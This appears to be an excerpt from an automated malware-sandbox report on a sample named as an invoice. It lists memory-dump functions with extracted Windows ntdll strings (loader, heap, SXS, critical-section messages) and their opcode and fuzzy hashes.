                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A854CE
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A8540A, 01A85496, 01A85519
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01A85543
                                  • Address of the debug info found in the active list., xrefs: 01A854AE, 01A854FA
                                  • Critical section address, xrefs: 01A85425, 01A854BC, 01A85534
                                  • Critical section address., xrefs: 01A85502
                                  • Thread identifier, xrefs: 01A8553A
                                  • corrupted critical section, xrefs: 01A854C2
                                  • Invalid debug info address of this critical section, xrefs: 01A854B6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  • API String ID: 0-2368682639
                                  • Opcode ID: 141b688bc1e015913d9c0d2469dc4c98d11af13c212aca779723e4f05c0af688
                                  • Instruction ID: 264ca1dc6fcf8d64644f6ba899d991c883bc441df7661d884de786976002f483
                                  • Opcode Fuzzy Hash: 141b688bc1e015913d9c0d2469dc4c98d11af13c212aca779723e4f05c0af688
                                  • Instruction Fuzzy Hash: B0818BB1E40348AFDB61CF99C844BAEBBB5FB48B14F144159FA08B7290D3B5A945CB60
                                  Function 01A429F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                  Download Yara Rule
                                  Strings
                                  • @, xrefs: 01A8259B
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A82412
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A822E4
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A8261F
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A82409
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A82602
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A82506
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A82498
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A824C0
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A82624
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A825EB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  • API String ID: 0-4009184096
                                  • Opcode ID: d1044870fb82fb307de54d732ad20ca9cc37e03b4f80f160ebb0e20a20dab430
                                  • Instruction ID: a872d14fc1ab35b645dd913bd6f4b35c13eaa08db4ef552b6620680cc74fc516
                                  • Opcode Fuzzy Hash: d1044870fb82fb307de54d732ad20ca9cc37e03b4f80f160ebb0e20a20dab430
                                  • Instruction Fuzzy Hash: 310250F1D002299FDB31DB54CD80BAAB7B8AF94704F4441EAE749A7241E7709E84CF69
                                  Function 01AB8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  • API String ID: 0-2515994595
                                  • Opcode ID: 1bed8a73161f6809dfebb694c757745484924c4f1dd0a9f1a6c85b639fc761fc
                                  • Instruction ID: 9289f83a00953a87a498fb4bc8b60f5371dee3bc6109821514baa6949dd71c4a
                                  • Opcode Fuzzy Hash: 1bed8a73161f6809dfebb694c757745484924c4f1dd0a9f1a6c85b639fc761fc
                                  • Instruction Fuzzy Hash: B851B0B11043829BD32ADF5CC984BEBBBECAF94640F14491EE959C3242E778D508CBD2
                                  Function 01AC0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 0-1700792311
                                  • Opcode ID: d5d809175108bb11bd57f7035e56a7048d08e776f2d154d35597629769c809f4
                                  • Instruction ID: 12b0e6ea40f0dfd5fea014bdf387d053e51cec5b66773a83ca2d9be16470678b
                                  • Opcode Fuzzy Hash: d5d809175108bb11bd57f7035e56a7048d08e776f2d154d35597629769c809f4
                                  • Instruction Fuzzy Hash: 6FD1DC39600686EFDB22DFA8D640AAAFBF1FF59B14F08805DF5499B252C734D981CB14
                                  Function 01A989B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                  Download Yara Rule
                                  Strings
                                  • VerifierFlags, xrefs: 01A98C50
                                  • VerifierDlls, xrefs: 01A98CBD
                                  • AVRF: -*- final list of providers -*- , xrefs: 01A98B8F
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A98A67
                                  • VerifierDebug, xrefs: 01A98CA5
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A98A3D
                                  • HandleTraces, xrefs: 01A98C8F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  • API String ID: 0-3223716464
                                  • Opcode ID: e453aa84ce04c4177e23da222c9caf25a0d8a4af827691d9801da9eae5c17558
                                  • Instruction ID: 8078efec695b35422e161d8d271085236726b0e47104b65bed31eb4c112ca595
                                  • Opcode Fuzzy Hash: e453aa84ce04c4177e23da222c9caf25a0d8a4af827691d9801da9eae5c17558
                                  • Instruction Fuzzy Hash: 8991267160131AAFDB32EF28C980B2B7BE4AF95714F09445CFA446B651C738EC84CB91
                                  Function 01A1EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  • API String ID: 0-1109411897
                                  • Opcode ID: 31c93990d7da4dc1c617128a1541074b2ac9dd414eda3bfc25e8bb48adf223b0
                                  • Instruction ID: 76843423d2eaa0c667f9070eaeed0317b8f7991465c3639fa4d1a99fc9117865
                                  • Opcode Fuzzy Hash: 31c93990d7da4dc1c617128a1541074b2ac9dd414eda3bfc25e8bb48adf223b0
                                  • Instruction Fuzzy Hash: 07A27A70A0566A8FDF65CF18CD98BA9BBB5BF49300F1442E9D90DA7295DB309E84CF00
                                  Function 01A463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-792281065
                                  • Opcode ID: 8fbf175dd625641c013fc9dbf60e798ac72e98409783c836ffb0ed84153346f7
                                  • Instruction ID: 28c934ea2ab2f744597732b704a67d02352fb01b035478bc22a448425bd9791a
                                  • Opcode Fuzzy Hash: 8fbf175dd625641c013fc9dbf60e798ac72e98409783c836ffb0ed84153346f7
                                  • Instruction Fuzzy Hash: 27915D70B04316DBEF36EF58DA48BAA7BF1BF95B24F04011DD9086B682E7749841CB91
                                  Function 01A0645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpInitShimEngine, xrefs: 01A699F4, 01A69A07, 01A69A30
                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A69A2A
                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A69A01
                                  • apphelp.dll, xrefs: 01A06496
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A69A11, 01A69A3A
                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A699ED
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-204845295
                                  • Opcode ID: 7d9f68a293b7ae2c436d63ba5f9b70e5f498930f8436ac6d0c2063f66ea196f7
                                  • Instruction ID: a82321951e1562344035460dea121f4e76427c280e87b170a4cc99ef5fb7a4de
                                  • Opcode Fuzzy Hash: 7d9f68a293b7ae2c436d63ba5f9b70e5f498930f8436ac6d0c2063f66ea196f7
                                  • Instruction Fuzzy Hash: DB51E071248300AFE722DF24D945FABB7E8FBA4748F04091DF689971A0D730E905CB92
                                  Function 01A4C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpInitializeImportRedirection, xrefs: 01A88177, 01A881EB
                                  • Loading import redirection DLL: '%wZ', xrefs: 01A88170
                                  • LdrpInitializeProcess, xrefs: 01A4C6C4
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01A88181, 01A881F5
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A4C6C3
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 01A881E5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-475462383
                                  • Opcode ID: 14de16da509e299ac6445378a6e5a93d606cfa5fef8009c9f1431bc19c0a979a
                                  • Instruction ID: f7c5c71a11d60b790200f3d1af3bfdf67e8c2e61fc36c8cab42341fc6cd741b6
                                  • Opcode Fuzzy Hash: 14de16da509e299ac6445378a6e5a93d606cfa5fef8009c9f1431bc19c0a979a
                                  • Instruction Fuzzy Hash: E23107716443429FC325EF28DA49E1AB7D5FFD4B20F04451CF9896B291EB20ED04C7A2
                                  Function 01A42674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A821BF
                                  • SXS: %s() passed the empty activation context, xrefs: 01A82165
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A82180
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A8219F
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A82178
                                  • RtlGetAssemblyStorageRoot, xrefs: 01A82160, 01A8219A, 01A821BA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  • API String ID: 0-861424205
                                  • Opcode ID: 5495f0343b57fcb2be7d43ccc7235e3ed3a4bfff2ff7ad411650d1608111ca43
                                  • Instruction ID: 5febc21dc7a42549a415b6012f165fe6adf2916b9ebf51f3c11d8c5a77436698
                                  • Opcode Fuzzy Hash: 5495f0343b57fcb2be7d43ccc7235e3ed3a4bfff2ff7ad411650d1608111ca43
                                  • Instruction Fuzzy Hash: 2031C73AB403157BEB21DA9A9C81F6A7E78DFD5A90F19405FBB08B7140D2709A41C7A1
                                  Function 01A5096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 01A52DF0: LdrInitializeThunk.NTDLL ref: 01A52DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50D74
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  • API String ID: 1404860816-0
                                  • Opcode ID: a12be1f2cb6307c13dd973e3d6e339f51a7de7f86b436cd0e3a89d527448239c
                                  • Instruction ID: d9638875fcb603fb68a4a225f2ac54d6723157b17a25c988ad97fc8b4089b0fb
                                  • Opcode Fuzzy Hash: a12be1f2cb6307c13dd973e3d6e339f51a7de7f86b436cd0e3a89d527448239c
                                  • Instruction Fuzzy Hash: DC427C71900715DFDB61CF28C980BAAB7F4FF44314F1445AAE989EB241E770AA84CF60
                                  Function 01A1A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  • API String ID: 0-379654539
                                  • Opcode ID: 196848676126e7acc264bee35a4fa4fff586b9842b906c87b003db0e93c2a14f
                                  • Instruction ID: 60e38c15329d025118391300acc034854e5cb67555c328dfc5a9e87efef95600
                                  • Opcode Fuzzy Hash: 196848676126e7acc264bee35a4fa4fff586b9842b906c87b003db0e93c2a14f
                                  • Instruction Fuzzy Hash: FEC19C74209382CFD711CF68C544B6ABBF4BF84714F08486AF996CB25AE734CA49CB56
                                  Function 01A48402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpInitializeProcess, xrefs: 01A48422
                                  • @, xrefs: 01A48591
                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A4855E
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A48421
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1918872054
                                  • Opcode ID: 744f0750148bb4500ded6649c1dc65b54f2b3be50ecb889274b3f120248cf735
                                  • Instruction ID: 2b50ec2e9a80a9f37d8f0e9f5f31af73e900706c071886dee80b4bde1fa63c45
                                  • Opcode Fuzzy Hash: 744f0750148bb4500ded6649c1dc65b54f2b3be50ecb889274b3f120248cf735
                                  • Instruction Fuzzy Hash: 42919D71508345AFD722EF65DD40FABBBE8BF84744F40492EFA8492151E338D944CBA2
                                  Function 01A4273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() passed the empty activation context, xrefs: 01A821DE
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A821D9, 01A822B1
                                  • .Local, xrefs: 01A428D8
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A822B6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  • Opcode ID: 44139a5a679f9a1f482015eef20e4f4fce553f00245771b1594f8d3fa2ac6e26
                                  • Instruction ID: 4a0cbf5a5c293e531bb3acc0cd5561d5e74cacac26a2df7385a07f04219f45cc
                                  • Opcode Fuzzy Hash: 44139a5a679f9a1f482015eef20e4f4fce553f00245771b1594f8d3fa2ac6e26
                                  • Instruction Fuzzy Hash: 58A1A135940229DFDB25DF68DC84BA9B7B1BF98354F1541EAE908E7252E7309E80CF90
                                  Function 01A44AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlDeactivateActivationContext, xrefs: 01A83425, 01A83432, 01A83451
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A8342A
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A83437
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A83456
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  • API String ID: 0-1245972979
                                  • Opcode ID: 7bb11320ff7533f5c05664bf27f8d3ef383c081bac01699d3d3fdbb754d4fa9a
                                  • Instruction ID: e08a9587fc0aa36d1872bffb0e252fd720965c5f1369b4e033b345bd7150ee37
                                  • Opcode Fuzzy Hash: 7bb11320ff7533f5c05664bf27f8d3ef383c081bac01699d3d3fdbb754d4fa9a
                                  • Instruction Fuzzy Hash: E3612236600712ABDB22DF1DC841B2ABBE5BFC8B11F19852DE9559B242D734E801CB95
                                  Function 01A164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                  Download Yara Rule
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A7106B
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A71028
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A710AE
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A70FE5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  • API String ID: 0-1468400865
                                  • Opcode ID: c7f71ed7186ae1da267e50edf1971a95830d24bf727dde1bd911dd1fc67bc8b8
                                  • Instruction ID: 8e7a78d8da4d06600b12188a83b13799bc253ab9b8b67bb0e97b8b5142ecb119
                                  • Opcode Fuzzy Hash: c7f71ed7186ae1da267e50edf1971a95830d24bf727dde1bd911dd1fc67bc8b8
                                  • Instruction Fuzzy Hash: 9D71D2B1908305AFCB21DF28CA84B9B7FA9AF55764F040468FD498B18AD774D588CBD2
                                  Function 01A3245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                  Download Yara Rule
                                  Strings
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A7A992
                                  • apphelp.dll, xrefs: 01A32462
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A7A9A2
                                  • LdrpDynamicShimModule, xrefs: 01A7A998
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-176724104
                                  • Opcode ID: 445d66db8093cc516fb36c009226f2fe1c3d842f25964cc9b726e25f965e7861
                                  • Instruction ID: 424831b2efb3c78866c4dbb9090b710b0aed38b85cc2feee173b4a05fac163dc
                                  • Opcode Fuzzy Hash: 445d66db8093cc516fb36c009226f2fe1c3d842f25964cc9b726e25f965e7861
                                  • Instruction Fuzzy Hash: 3A310572A00201BBDB36AF5DDD85B6EBBF4FB94B04F19005AF911A7255C7B09A91CB80
                                  Function 01A229A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                  Download Yara Rule
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 01A23255
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A2327D
                                  • HEAP: , xrefs: 01A23264
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  • API String ID: 0-617086771
                                  • Opcode ID: 6e88a9c7c665acd93075ae7d70ccb2710472bb3f439e7220fd3a98e34d958a3e
                                  • Instruction ID: 5187ef934e33840aaa61e8962a7a715fea8d493489ecb18f49a4f81409bda3a0
                                  • Opcode Fuzzy Hash: 6e88a9c7c665acd93075ae7d70ccb2710472bb3f439e7220fd3a98e34d958a3e
                                  • Instruction Fuzzy Hash: D192AB70A042699FDF25CF6CC540BAEBBF1BF49300F18809AE999AB351D739A945CF50
                                  Function 01A20770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: 2b26088168923aecb632faa0161d7036fa4d5911aad16437bb124752afac6bb7
                                  • Instruction ID: ffc41200425ca598e4b9900cb7dda593e6a54442b86fd2ca9650ef30f368c941
                                  • Opcode Fuzzy Hash: 2b26088168923aecb632faa0161d7036fa4d5911aad16437bb124752afac6bb7
                                  • Instruction Fuzzy Hash: 74F18D70B00616DFEB16CF6CCA94B6AB7B5FF44304F148169E5169B391D734EA81CB90
                                  Function 01A36962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $@
                                  • API String ID: 0-1077428164
                                  • Opcode ID: 2ad76edabd761f094fda1de4d092216807ba7214de056fecfbcc976d79822cfc
                                  • Instruction ID: 3d53f9764fd8a94e619ee92566b22152b6a5425e19c6e70e82b7dfea500ec14c
                                  • Opcode Fuzzy Hash: 2ad76edabd761f094fda1de4d092216807ba7214de056fecfbcc976d79822cfc
                                  • Instruction Fuzzy Hash: 5BC28FB16083419FEB25CF68C881BABBBE5AFC8754F08892DF989C7241D734D945CB52
                                  Function 01A0A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
